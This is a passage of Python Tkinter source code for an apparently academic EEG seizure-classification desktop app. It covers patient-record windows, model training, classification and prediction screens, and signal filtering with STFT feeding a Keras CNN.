self.logo_labbio_resized = ImageTk.PhotoImage(self.resized_labbio)\n label = Label(image=self.logo_labbio_resized, bg=\"#DFEBE9\")\n label.image = self.logo_labbio_resized # keep a reference!\n label.pack(side=LEFT, anchor=SE, padx=1, pady=30)\n\n def frames_de_tela(self):\n self.frame_1 = Frame(self.root, bd=4, bg='#DFEBE9')\n self.frame_1.place(relx=0.70, rely=0.02, relwidth=0.27, relheight=0.80)\n\n def widgets_frame(self):\n ## Criando botao limpar\n self.Boton_info = Button(self.frame_1,\n text=\"Abaut\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.JanelaAbout,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n\n self.Boton_info.place(relx=0.02,\n rely=0.2,\n relwidth=0.98,\n relheight=0.10)\n\n ## Criando botao buscar\n self.Boton_add = Button(self.frame_1,\n text=\"Add Patient\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.JanelaAddPaciente,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_add.place(relx=0.02,\n rely=0.4,\n relwidth=0.98,\n relheight=0.10)\n\n ## Criando botao novo\n self.Boton_open = Button(self.frame_1,\n text=\"Open Patient\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.JanelaShowPaciente,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_open.place(relx=0.02,\n rely=0.6,\n relwidth=0.98,\n 
relheight=0.10)\n\n ## Criando botao alterar\n self.Boton_close = Button(self.frame_1,\n text=\"Close\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.root.quit,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_close.place(relx=0.02,\n rely=0.8,\n relwidth=0.98,\n relheight=0.10)\n\n ################################# ADD PAT ###########################################\n def frames_de_telaAddPat(self):\n self.frame_1 = Frame(self.root2,\n bd=4,\n bg='#DFEBE9',\n highlightbackground='#759fe6',\n highlightthickness=3)\n self.frame_1.place(relx=0.02, rely=0.02, relwidth=0.96, relheight=0.46)\n\n self.frame_2 = Frame(self.root2, bd=4, bg='#DFEBE9')\n self.frame_2.place(relx=0.02, rely=0.5, relwidth=0.96, relheight=0.46)\n\n def widgets_frameAddPat(self):\n self.abas = ttk.Notebook(self.frame_1)\n self.aba1 = Frame(self.abas)\n self.aba2 = Frame(self.abas)\n\n self.aba1.configure(background='#DFEBE9')\n self.aba2.configure(background='#DFEBE9')\n\n self.abas.add(self.aba1, text=\" \")\n self.abas.add(self.aba2, text=\" \")\n\n self.abas.place(relx=0, rely=0, relwidth=0.98, relheight=0.98)\n\n self.canvas_bt = Canvas(self.aba1,\n bd=0,\n bg='#1e3743',\n highlightbackground='gray',\n highlightthickness=5)\n\n self.canvas_bt.place(relx=0.19,\n rely=0.08,\n relwidth=0.42,\n relheight=0.19)\n ## Criando botao limpar\n self.bt_lipar = Button(self.aba1,\n text=\"Clean\",\n bd=2,\n bg='#14787A',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 9, 'bold'),\n command=self.limpa_cliente)\n self.bt_lipar.place(relx=0.2, rely=0.1, relwidth=0.1, relheight=0.15)\n\n ## Criando botao buscar\n self.bt_buscar = Button(self.aba1,\n text=\"Search\",\n bd=2,\n bg='#14787A',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 9, 'bold'),\n command=self.busca_cliente)\n self.bt_buscar.place(relx=0.3, rely=0.1, relwidth=0.1, relheight=0.15)\n\n texto_balao_buscar = \"Type in the info field the patient you want to search\"\n self.balao_buscar = tix.Balloon(self.aba1)\n self.balao_buscar.bind_widget(self.bt_buscar,\n balloonmsg=texto_balao_buscar)\n\n ## Criando botao apagar\n self.bt_apagar = Button(self.aba1,\n text=\"Delete\",\n bd=2,\n bg='#14787A',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 9, 'bold'),\n command=self.deleta_cliente)\n self.bt_apagar.place(relx=0.4, rely=0.1, relwidth=0.1, relheight=0.15)\n\n ## Criando botao alterar\n self.bt_alterar = Button(self.aba1,\n text=\"Change\",\n bd=2,\n bg='#14787A',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 9, 'bold'),\n command=self.alterar_cliente)\n self.bt_alterar.place(relx=0.5, rely=0.1, relwidth=0.1, relheight=0.15)\n\n ## Botão Classificação\n # Deve abrir uma opção para escrever qual o modelo que deseja usar para realizar a classificação\n #\n #\n #\n self.bt_novo = Button(self.aba1,\n text=\"Classification\",\n bd=2,\n bg='#1e3743',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 11, 'bold'),\n command=self.JanelaClassificacaoSetup)\n self.bt_novo.place(relx=0.68, rely=0.1, relwidth=0.3, relheight=0.15)\n\n ## Botão Predicitions\n # Deve demonstrar o que queremos ver dos dados\n #\n #\n\n self.bt_novo2 = Button(self.aba1,\n text=\"Predictions\",\n bd=2,\n bg='#1e3743',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 11, 'bold'),\n 
command=self.JanelaPredictionSetup)\n self.bt_novo2.place(relx=0.68, rely=0.25, relwidth=0.3, relheight=0.15)\n\n ## Botão Treino\n # Deve avisar se deseja executar um treino com um modelo já existente ou se irá criar um novo modelo\n #\n #\n\n self.bt_novo2 = Button(self.aba1,\n text=\"Train\",\n bd=2,\n bg='#1e3743',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 11, 'bold'),\n command=self.JanelaTreinamento)\n self.bt_novo2.place(relx=0.68, rely=0.40, relwidth=0.3, relheight=0.15)\n\n ## Criando botao Treinamento\n #self.bt_treinamento = Button(self.aba1, text=\"Classify\", bd=2, bg='#00FFFF',\n # activebackground='yellow', activeforeground='black',fg = 'black',\n # font = ('verdana',9,'bold'), command=self.JanelaClassificacao)\n #self.bt_treinamento.place(relx=0.5, rely=0.1, relwidth=0.1,relheight=0.15)\n\n ## Criando botao files\n self.bt_files = Button(self.aba1,\n text=\"Files\",\n bd=2,\n font=('verdana', 9, 'bold'),\n command=lambda: self.buscar_arquivos())\n self.bt_files.place(relx=0.5, rely=0.43, relwidth=0.1, relheight=0.15)\n\n ## Criação da label e entrada de código\n self.lb_codigo = Label(self.aba1,\n text=\"Code\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_codigo.place(relx=0.05, rely=0.05)\n\n self.codigo_entry = Entry(self.aba1)\n self.codigo_entry.place(relx=0.05, rely=0.15, relwidth=0.08)\n\n ## Criação da label e entrada da age -\n self.lb_idade = Label(self.aba1,\n text=\"Age :\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.age_entry = Entry(self.aba1)\n self.lb_idade.place(relx=0.05, rely=0.3)\n self.age_entry.place(relx=0.05, rely=0.45, relwidth=0.2)\n\n ## Criação da label e entrada da genero\n self.lb_genero = Label(self.aba1,\n text=\"Gender :\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_genero.place(relx=0.05, rely=0.68)\n\n self.Tipvar = StringVar()\n self.TipV = ('Male', 'Woman')\n self.Tipvar.set(\"Male\")\n self.popupMenu = OptionMenu(self.aba1, self.Tipvar, *self.TipV)\n self.popupMenu.place(relx=0.05, rely=0.80, relwidth=0.3)\n self.gender_entry = self.Tipvar.get()\n\n ## Criação da label e entrada da File\n self.lb_files = Label(self.aba1,\n text=\"Files :\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_files.place(relx=0.5, rely=0.3)\n\n ## Criação da label e entrada da Info\n self.lb_info = Label(self.aba1,\n text=\"Info :\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_info.place(relx=0.5, rely=0.6)\n self.info_entry = Entry(self.aba1)\n self.info_entry.place(relx=0.5, rely=0.75, relwidth=0.4)\n\n def lista_frame2(self):\n self.listaCli = ttk.Treeview(self.frame_2,\n height=3,\n column=(\"col1\", \"col2\", \"col3\", \"col4\",\n \"col5\", \"col6\", \"col7\", \"col8\"))\n self.listaCli.heading(\"#0\", text=\"\")\n self.listaCli.heading(\"#1\", text=\"Cod\")\n self.listaCli.heading(\"#2\", text=\"Age\")\n self.listaCli.heading(\"#3\", text=\"Gender\")\n self.listaCli.heading(\"#4\", text=\"Info\")\n self.listaCli.heading(\"#5\", text=\"Accur.\")\n self.listaCli.heading(\"#6\", text=\"Recall\")\n self.listaCli.heading(\"#7\", text=\"Precision\")\n self.listaCli.heading(\"#8\", text=\"File\")\n\n self.listaCli.column(\"#0\", width=1)\n self.listaCli.column(\"#1\", width=40)\n self.listaCli.column(\"#2\", width=40)\n self.listaCli.column(\"#3\", width=70)\n self.listaCli.column(\"#4\", width=120)\n self.listaCli.column(\"#5\", width=50)\n self.listaCli.column(\"#6\", width=50)\n self.listaCli.column(\"#7\", width=50)\n self.listaCli.column(\"#8\", width=150)\n\n self.listaCli.place(relx=0.01, rely=0.1, 
relwidth=0.95, relheight=0.85)\n\n        self.scroolLista = Scrollbar(self.frame_2, orient='vertical')\n        self.listaCli.configure(yscroll=self.scroolLista.set)\n        self.scroolLista.place(relx=0.96,\n                               rely=0.1,\n                               relwidth=0.04,\n                               relheight=0.85)\n        self.listaCli.bind(\"<Double-1>\", self.OnDoubleClick)\n\n    def Menus(self):\n        menubar = Menu(self.root2)\n        self.root2.config(menu=menubar)\n        filemenu = Menu(menubar)\n        filemenu2 = Menu(menubar)\n\n        def Quit():\n            self.root2.destroy()\n\n        menubar.add_cascade(label=\"Options\", menu=filemenu)\n        menubar.add_cascade(label=\"Reports\", menu=filemenu2)\n        filemenu.add_command(label=\"exit\", command=Quit)\n        filemenu2.add_command(label=\"Clean\", command=self.limpa_cliente)\n        filemenu2.add_command(label=\"Customer File\",\n                              command=self.gerarRelatorioCliente)\n\n    def tela2(self):\n        self.root2.title(\"Add Patient\")\n        self.root2.config(bg=\"#DFEBE9\")\n        self.root2.geometry(\"1024x768\")\n        self.root2.resizable(True, True)\n        self.root2.maxsize(width=900, height=700)\n        self.root2.minsize(width=500, height=400)\n        self.root2.transient(self.root)\n        self.root2.focus_force()\n        self.root2.grab_set()\n\n    def JanelaAddPaciente(self):\n        self.root2 = Toplevel()\n        self.tela2()\n        self.frames_de_telaAddPat()\n        self.widgets_frameAddPat()\n        self.lista_frame2()\n        self.select_lista()\n        self.Menus()\n\n    ################################################ TreinamentoSetup SCREEN\n\n    def tela10(self):\n        self.root6.title(\"Train\")\n        self.root6.config(bg=\"#DFEBE9\")\n        self.root6.geometry(\"1024x768\")\n        self.root6.resizable(True, True)\n        self.root6.maxsize(width=300, height=300)\n        self.root6.minsize(width=300, height=300)\n        self.root6.transient(self.root2)\n        self.root6.focus_force()\n        self.root6.grab_set()\n\n    def TelaTreino(self):\n\n        canvasroot6 = Canvas(self.root6,\n                             width=1000,\n                             height=700,\n                             relief='raised',\n                             bg=\"#DFEBE9\")\n        canvasroot6.pack()\n\n        def Validar():\n            self.TreinamentoOcorrendo()\n            time.sleep(200)\n            self.TreinamentoModelo()\n            print(\"Trained\")\n\n        #Imagens logs=os\n        width = 500\n        height = 200\n\n        # Title\n        label2 = Label(self.root6,\n                       text=\"\"\"Select whether you want to create a new model \n         or use one that already exists:\"\"\")\n        label2.config(font=('helvetica', 9), bg=\"#DFEBE9\")\n        canvasroot6.create_window(100, 20, window=label2)\n\n        ## Creating the model type label and entry\n        self.lb_type = Label(self.root6,\n                             text=\"Model :\",\n                             bg=\"#DFEBE9\",\n                             fg='#107db2')\n        self.lb_type.place(relx=0.05, rely=0.2)\n        self.Tipvar = StringVar()\n        self.TipV = ('New Model', 'Old Model')\n        self.Tipvar.set(\"New Model\")\n        self.popupMenu = OptionMenu(self.root6, self.Tipvar, *self.TipV)\n        self.popupMenu.place(relx=0.05, rely=0.3, relwidth=0.5)\n        self.model_type_entry = self.Tipvar.get()\n\n        ## Creating the model name label and entry\n        self.lb_name = Label(self.root6,\n                             text=\"Choose model name:\",\n                             bg=\"#DFEBE9\",\n                             fg='#107db2')\n        self.lb_name.place(relx=0.05, rely=0.45)\n        self.new_model_name = Entry(self.root6)\n        self.new_model_name.place(relx=0.05, rely=0.55, relwidth=0.5)\n\n        ## Creating the file selection label and button\n        self.lb_model = Label(self.root6,\n                              text=\"Select the file for train (namefile[0]):\",\n                              bg=\"#DFEBE9\",\n                              fg='#107db2')\n        self.lb_model.place(relx=0.05, rely=0.65)\n        self.bt_files = Button(self.root6,\n                               text=\"Files\",\n                               bd=2,\n                               font=('verdana', 9, 'bold'),\n                               command=lambda: self.buscar_arquivo2())\n        self.bt_files.place(relx=0.05, rely=0.75, relwidth=0.5, relheight=0.1)\n\n        ## Creating the Done button\n\n        self.Boton_done = Button(self.root6,\n                                 text=\"Done\",\n                                 
font=(\"AvantGarde\", 9, \"bold\"),\n command=Validar,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_done.place(relx=0.70,\n rely=0.8,\n relwidth=0.20,\n relheight=0.10)\n\n def JanelaTreinamento(self):\n self.root6 = Toplevel()\n self.tela10()\n self.TelaTreino()\n\n ################################################ TELA ClassficacaoSetup\n\n def tela11(self):\n self.root7.title(\"Classification\")\n self.root7.config(bg=\"#DFEBE9\")\n self.root7.geometry(\"1024x768\")\n self.root7.resizable(True, True)\n self.root7.maxsize(width=300, height=300)\n self.root7.minsize(width=300, height=300)\n self.root7.transient(self.root2)\n self.root7.focus_force()\n self.root7.grab_set()\n\n def TelaClassificacao(self):\n canvasroot7 = Canvas(self.root7,\n width=1000,\n height=700,\n relief='raised',\n bg=\"#DFEBE9\")\n canvasroot7.pack()\n\n def Classificando():\n self.JanelaClassificacao()\n print(\"ACCURACY ENTRY: \" + self.accuracy_entry)\n print(\"RECALL ENTRY: \" + self.recall_entry)\n print(\"PRECISION ENTRY: \" + self.precision_entry)\n self.accuracy_entry = self.accurancyValue_Entry\n self.recall_entry = self.recallValue_Entry\n self.precision_entry = self.precisionValue_Entry\n print(\"ACCURACY ENTRY: \" + self.accuracy_entry)\n print(\"RECALL ENTRY: \" + self.recall_entry)\n print(\"PRECISION ENTRY: \" + self.precision_entry)\n print(\"Add Cliente\")\n self.add_cliente()\n print(\"Finalizou Treino e salvou cliente\")\n\n #Imagens logs=os\n width = 500\n height = 200\n\n # Title\n label2 = Label(\n self.root7,\n text=\"\"\"Choose a pre-existing model to classify your data.\n If you wanted to create a new model , go back and \n select the Training option\"\"\")\n label2.config(font=('helvetica', 9), bg=\"#DFEBE9\")\n canvasroot7.create_window(145, 40, window=label2)\n\n ## Criasção da label e entrada do tipo\n self.lb_name = Label(self.root7,\n text=\"Select Model Name\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_name.place(relx=0.05, rely=0.25)\n self.existed_model_name = Entry(self.root7)\n self.existed_model_name.place(relx=0.05, rely=0.35, relwidth=0.5)\n\n ## Botão de Seleção dos Arquivos para Classificação\n\n ## Criação da label e entrada do tipo\n\n self.Boton_done = Button(self.root7,\n text=\"Done\",\n font=(\"AvantGarde\", 9, \"bold\"),\n command=Classificando,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_done.place(relx=0.70,\n rely=0.8,\n relwidth=0.20,\n relheight=0.10)\n\n def JanelaClassificacaoSetup(self):\n self.root7 = Toplevel()\n self.tela11()\n self.TelaClassificacao()\n\n ################################################ TELA ClassficacaoSetup\n\n def tela13(self):\n self.root10.title(\"Prediction\")\n self.root10.config(bg=\"#DFEBE9\")\n self.root10.geometry(\"1024x768\")\n self.root10.resizable(True, True)\n self.root10.maxsize(width=300, height=300)\n self.root10.minsize(width=300, height=300)\n self.root10.transient(self.root2)\n self.root10.focus_force()\n self.root10.grab_set()\n\n def TelaPrediction(self):\n canvasroot10 = Canvas(self.root10,\n width=1000,\n height=700,\n relief='raised',\n bg=\"#DFEBE9\")\n canvasroot10.pack()\n\n def Prediction():\n self.JanelaPrediction()\n print(\"ACCURACY ENTRY: \" + self.accuracy_entry)\n print(\"RECALL ENTRY: \" + self.recall_entry)\n print(\"PRECISION ENTRY: \" + self.precision_entry)\n self.accuracy_entry = self.accurancyValue_Entry\n self.recall_entry = self.recallValue_Entry\n self.precision_entry = 
self.precisionValue_Entry\n            print(\"ACCURACY ENTRY: \" + self.accuracy_entry)\n            print(\"RECALL ENTRY: \" + self.recall_entry)\n            print(\"PRECISION ENTRY: \" + self.precision_entry)\n            print(\"Add client\")\n            self.add_cliente()\n            print(\"Finished training and saved the client\")\n\n        #Imagens logs=os\n        width = 500\n        height = 200\n\n        # Title\n        label2 = Label(\n            self.root10,\n            text=\"\"\"Choose a pre-existing model to predict your data.\n         If you want to create a new model, go back and \n          select the Training option\"\"\")\n        label2.config(font=('helvetica', 9), bg=\"#DFEBE9\")\n        canvasroot10.create_window(145, 40, window=label2)\n\n        ## Creating the model name label and entry\n        self.lb_name = Label(self.root10,\n                             text=\"Select Model Name\",\n                             bg=\"#DFEBE9\",\n                             fg='#107db2')\n        self.lb_name.place(relx=0.05, rely=0.25)\n        self.existed_model_name = Entry(self.root10)\n        self.existed_model_name.place(relx=0.05, rely=0.35, relwidth=0.5)\n\n        ## File selection button for classification\n\n        ## Creating the Done button\n\n        self.Boton_done = Button(self.root10,\n                                 text=\"Done\",\n                                 font=(\"AvantGarde\", 9, \"bold\"),\n                                 command=Prediction,\n                                 bg=\"#14787A\",\n                                 fg=\"#ffffff\",\n                                 width=\"15\",\n                                 height=\"1\",\n                                 cursor=\"hand2\")\n        self.Boton_done.place(relx=0.70,\n                              rely=0.8,\n                              relwidth=0.20,\n                              relheight=0.10)\n\n    def JanelaPredictionSetup(self):\n        self.root10 = Toplevel()\n        self.tela13()\n        self.TelaPrediction()\n\n    ############################################### ABOUT\n    def tela3(self):\n        self.root3.title(\"About\")\n        self.root3.config(bg=\"#DFEBE9\")\n        self.root3.geometry(\"1024x768\")\n        self.root3.resizable(0, 0)\n        self.root3.transient(self.root)\n        self.root3.focus_force()\n        self.root3.grab_set()\n\n    def Tela(self):\n        canvasroot3 = Canvas(self.root3,\n                             width=1000,\n                             height=700,\n                             relief='raised',\n                             bg=\"#DFEBE9\")\n        canvasroot3.pack()\n\n        self.Boton_close = Button(self.root3,\n                                  text=\"Close\",\n                                  font=(\"AvantGarde\", 20, \"bold\"),\n                                  command=self.root3.destroy,\n                                  bg=\"#14787A\",\n                                  fg=\"#ffffff\",\n                                  width=\"15\",\n                                  height=\"1\",\n                                  cursor=\"hand2\")\n        self.Boton_close.place(relx=0.70,\n                               rely=0.8,\n                               relwidth=0.20,\n                               relheight=0.10)\n\n        #Imagens logs=os\n        width = 400\n        height = 400\n\n        # IMAGE 1\n        img = Image.open(\"logos/logos_unidas.png\")\n        img = img.resize((width, height), Image.ANTIALIAS)\n        self.accurancy = ImageTk.PhotoImage(img)\n        canvasroot3.imageList = []\n        canvasroot3.pack()\n        #canvasroot3.create_image(1055, 300, anchor=\"e\", image=self.accurancy)\n        canvasroot3.create_image(1020, 300, anchor=\"e\", image=self.accurancy)\n        canvasroot3.imageList.append(self.accurancy)\n\n        # About\n        label2 = Label(self.root3, text=\"About the project:\")\n        label2.config(font=('helvetica', 14), bg=\"#DFEBE9\")\n        canvasroot3.create_window(180, 100, window=label2)\n\n        #about text in image\n        width = 600\n        height = 600\n        img4 = Image.open(\"logos/about.png\")\n        img4 = img4.resize((width, height), Image.ANTIALIAS)\n\n        self.accurancy4 = ImageTk.PhotoImage(img4)\n        canvasroot3.imageList = []\n        canvasroot3.pack()\n        canvasroot3.create_image(670, 380, anchor=\"e\", image=self.accurancy4)\n        canvasroot3.imageList.append(self.accurancy4)\n\n    def JanelaAbout(self):\n        self.root3 = Toplevel()\n        self.tela3()\n        self.Tela()\n\n    ############################################### SHOW PAT\n    def frames_de_telaShowPat(self):\n        self.frame_1 = Frame(self.root4,\n                             bd=4,\n                             bg='#DFEBE9',\n                             highlightbackground='#759fe6',\n                             highlightthickness=3)\n        self.frame_1.place(relx=0.02, rely=0.02, relwidth=0.96, relheight=0.25)\n\n        self.frame_2 = 
Frame(self.root4, bd=4, bg='#DFEBE9')\n self.frame_2.place(relx=0.02, rely=0.3, relwidth=0.96, relheight=0.65)\n\n def widgets_frameShowPat(self):\n self.abas = ttk.Notebook(self.frame_1)\n self.aba1 = Frame(self.abas)\n self.aba2 = Frame(self.abas)\n\n self.aba1.configure(background='#DFEBE9')\n self.aba2.configure(background=\"lightgray\")\n\n self.abas.add(self.aba1, text=\" \")\n self.abas.add(self.aba2, text=\" \")\n\n self.abas.place(relx=0, rely=0, relwidth=0.98, relheight=0.98)\n\n self.codigo_entry = Entry(self.aba1)\n self.Tipvar1 = StringVar()\n self.Tipvar1.set(\"Child: 0-18\")\n self.age_entry = self.Tipvar1.get()\n\n self.info_entry = Entry(self.aba1)\n\n self.Tipvar = StringVar()\n self.Tipvar.set(\"Male\")\n self.gender_entry = self.Tipvar.get()\n\n self.canvas_bt = Canvas(self.aba1,\n bd=0,\n bg='#1e3743',\n highlightbackground='gray',\n highlightthickness=5)\n\n self.canvas_bt.place(relx=0.19,\n rely=0.2,\n relwidth=0.32,\n relheight=0.40)\n ## Criando botao limpar bg=\"#14787A\", fg=\"#ffffff\"\n self.bt_lipar = Button(self.aba1,\n text=\"Clean\",\n bd=2,\n bg=\"#14787A\",\n activebackground='#108ecb',\n activeforeground='white',\n fg=\"#ffffff\",\n font=('verdana', 9, 'bold'),\n command=self.limpa_cliente)\n self.bt_lipar.place(relx=0.2, rely=0.24, relwidth=0.1, relheight=0.30)\n\n ## Criando botao buscar\n self.bt_buscar = Button(self.aba1,\n text=\"Search\",\n bd=2,\n bg=\"#14787A\",\n activebackground='#108ecb',\n activeforeground='white',\n fg=\"#ffffff\",\n font=('verdana', 9, 'bold'),\n command=self.busca_cliente)\n self.bt_buscar.place(relx=0.3, rely=0.24, relwidth=0.1, relheight=0.30)\n\n texto_balao_buscar = \"Type in the code field the patient you want to search\"\n self.balao_buscar = tix.Balloon(self.aba1)\n self.balao_buscar.bind_widget(self.bt_buscar,\n balloonmsg=texto_balao_buscar)\n\n ## Criando botao apagar\n self.bt_apagar = Button(self.aba1,\n text=\"Delete\",\n bd=2,\n bg='#14787A',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 9, 'bold'),\n command=self.deleta_cliente)\n self.bt_apagar.place(relx=0.4, rely=0.24, relwidth=0.1, relheight=0.30)\n\n ## Criação da label e entrada de código\n self.lb_codigo = Label(self.aba1,\n text=\"Code\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_codigo.place(relx=0.05, rely=0.10)\n\n self.codigo_entry = Entry(self.aba1)\n self.codigo_entry.place(relx=0.05, rely=0.30, relwidth=0.08)\n\n def lista_frame4(self):\n self.listaCli = ttk.Treeview(self.frame_2,\n height=3,\n column=(\"col1\", \"col2\", \"col3\", \"col4\",\n \"col5\", \"col6\", \"col7\", \"col8\"))\n self.listaCli.heading(\"#0\", text=\"\")\n self.listaCli.heading(\"#1\", text=\"Cod\")\n self.listaCli.heading(\"#2\", text=\"Age\")\n self.listaCli.heading(\"#3\", text=\"Gender\")\n self.listaCli.heading(\"#4\", text=\"Info\")\n self.listaCli.heading(\"#5\", text=\"Accur.\")\n self.listaCli.heading(\"#6\", text=\"Recall\")\n self.listaCli.heading(\"#7\", text=\"Precision\")\n self.listaCli.heading(\"#8\", text=\"File\")\n\n self.listaCli.column(\"#0\", width=1)\n self.listaCli.column(\"#1\", width=40)\n self.listaCli.column(\"#2\", width=40)\n self.listaCli.column(\"#3\", width=70)\n self.listaCli.column(\"#4\", width=120)\n self.listaCli.column(\"#5\", width=50)\n self.listaCli.column(\"#6\", width=50)\n self.listaCli.column(\"#7\", width=50)\n self.listaCli.column(\"#8\", width=150)\n\n self.listaCli.place(relx=0.01, rely=0.1, relwidth=0.95, relheight=0.85)\n\n self.scroolLista = Scrollbar(self.frame_2, 
orient='vertical')\n        self.listaCli.configure(yscroll=self.scroolLista.set)\n        self.scroolLista.place(relx=0.96,\n                               rely=0.1,\n                               relwidth=0.04,\n                               relheight=0.85)\n        self.listaCli.bind(\"<Double-1>\", self.OnDoubleClick)\n\n    def MenusShowPaciente(self):\n        menubar = Menu(self.root4)\n        self.root4.config(menu=menubar)\n        filemenu = Menu(menubar)\n        filemenu2 = Menu(menubar)\n\n        def Quit():\n            self.root4.destroy()\n\n        menubar.add_cascade(label=\"Options\", menu=filemenu)\n        menubar.add_cascade(label=\"Reports\", menu=filemenu2)\n        filemenu.add_command(label=\"exit\", command=Quit)\n        filemenu2.add_command(label=\"Clean\", command=self.limpa_cliente)\n        filemenu2.add_command(label=\"Customer File\",\n                              command=self.gerarRelatorioCliente)\n\n    def tela4(self):\n        self.root4.title(\"Show\")\n        self.root4.config(bg=\"#DFEBE9\")\n        self.root4.geometry(\"1024x768\")\n        self.root4.resizable(True, True)\n        self.root4.maxsize(width=900, height=700)\n        self.root4.minsize(width=500, height=400)\n        self.root4.transient(self.root)\n        self.root4.focus_force()\n        self.root4.grab_set()\n\n    def JanelaShowPaciente(self):\n        self.root4 = Toplevel()\n        self.tela4()\n        self.frames_de_telaShowPat()\n        self.widgets_frameShowPat()\n        self.lista_frame4()\n        self.select_lista()\n        self.MenusShowPaciente()\n\n    # CLASSIFICATION WINDOW\n    def frames_de_telaClassification(self):\n        self.frame_1 = Frame(self.root5, bd=4, bg='#DFEBE9')\n        self.frame_1.place(relx=0.70, rely=0.02, relwidth=0.27, relheight=0.80)\n\n    def MenusClassification(self):\n        menubar = Menu(self.root5)\n        self.root5.config(menu=menubar)\n        filemenu = Menu(menubar)\n        filemenu2 = Menu(menubar)\n\n        def Quit():\n            self.root5.destroy()\n\n        menubar.add_cascade(label=\"Options\", menu=filemenu)\n        menubar.add_cascade(label=\"Reports\", menu=filemenu2)\n        filemenu.add_command(label=\"exit\", command=Quit)\n        filemenu2.add_command(label=\"Clean\", command=self.limpa_cliente)\n        filemenu2.add_command(label=\"Customer File\",\n                              command=self.gerarRelatorioCliente)\n\n    def tela5(self):\n        self.root5.title(\"Classification\")\n        self.root5.config(bg=\"#DFEBE9\")\n        self.root5.geometry(\"1024x768\")\n        self.root5.resizable(True, True)\n        self.root5.maxsize(width=900, height=700)\n        self.root5.minsize(width=500, height=400)\n        self.root5.transient(self.root2)\n        self.root5.focus_force()\n        self.root5.grab_set()\n\n    def Classificacao(self):\n        canvas4 = Canvas(self.root5,\n                         width=1000,\n                         height=500,\n                         relief='raised',\n                         bg=\"#DFEBE9\")\n        canvas4.pack()\n        # ------ Load the trained CNN model\n        print(self.existed_model_name.get())\n        network_name = self.existed_model_name.get()\n        model = tf.keras.models.load_model(network_name)\n\n        # ---- Load data files\n        data = self.nomeArquivoEDF\n        event = LeituraArquivos.LoadEvento(self.nomeArquivoTSE)\n        # print(event)\n\n        # --- read EEG data\n        raw = mne.io.read_raw_edf(data, preload=True)\n        raw.rename_channels(lambda s: s.strip(\".\"))\n        #raw.set_montage(\"standard_1020\")\n        #raw.set_eeg_reference(\"average\")\n        print(raw)  # print raw data\n        print(raw.info)  # print edf info\n\n        # ---- sampling rate\n        fs = raw.info['sfreq']  # sampling frequency\n        duration = len(\n            raw) / fs  # recording duration of whole EEG data in seconds\n\n        # ---- EEG data\n        eeg = raw.get_data()\n\n        # ---- Remove 60 Hz noise\n        signal_filter = processing.butter_bandstop_filter(eeg, 59, 61, fs, 5)\n        signal_filter = signal_filter[0:21, :]  #Limit to 21 channels\n\n        #------ Signal Bands\n        delta_teta = processing.butter_bandpass_filter(signal_filter, 1, 7, fs,\n                                                       5)\n        alpha_beta = 
processing.butter_bandpass_filter(signal_filter, 8, 30,\n                                                       fs, 5)\n        gamma = processing.butter_bandpass_filter(signal_filter, 31, 100, fs,\n                                                  5)\n        # ------ Applied STFT to signal bands\n        f, t, Zxx_delta_teta = processing.STFT(delta_teta, fs)\n        f, t, Zxx_alpha_beta = processing.STFT(alpha_beta, fs)\n        f, t, Zxx_gamma = processing.STFT(gamma, fs)\n\n        # ------- Create event vector 0 and 1\n        event_vec = processing.EventVector(event, t)\n\n        # ------- Cut first 1 minute\n        Zxx_delta_teta = Zxx_delta_teta[60:, :, :]\n        Zxx_alpha_beta = Zxx_alpha_beta[60:, :, :]\n        Zxx_gamma = Zxx_gamma[60:, :, :]\n        event_vec = event_vec[60:]\n\n        # ------- Create the input network\n        Zxx_size = Zxx_delta_teta.shape\n        Input_net = np.zeros((Zxx_size[0], Zxx_size[1], Zxx_size[2], 3))\n        Input_net[:, :, :, 0] = Zxx_delta_teta\n        Input_net[:, :, :, 1] = Zxx_alpha_beta\n        Input_net[:, :, :, 2] = Zxx_gamma\n\n        # -------- Classify events\n        cm, predictions, precision, recall, f_score = network.classify(\n            model, Input_net, event_vec)\n        cm_plot_labels = [\"Seizure-free\", \"Seizure\"]\n        network.plot_confusion_matrix(cm,\n                                      cm_plot_labels,\n                                      title=\"Confusion Matrix\")\n\n        plt.savefig('Resultado.png')\n\n        TP = cm[1][1]\n        TN = cm[0][0]\n        FN = cm[1][0]\n        FP = cm[0][1]\n\n        #plots.plot_predict(t, event_vec, predictions)\n        # -------- metrics\n        accuracy = (TP + TN) / (TP + FP + TN + FN) * 100\n        formatted_accuracy = \"{:.2f}\".format(accuracy)\n        accuracy = formatted_accuracy\n\n        recall = TP / (TP + FN) * 100  #also known as sensitivity\n        specificity = TN / (TN + 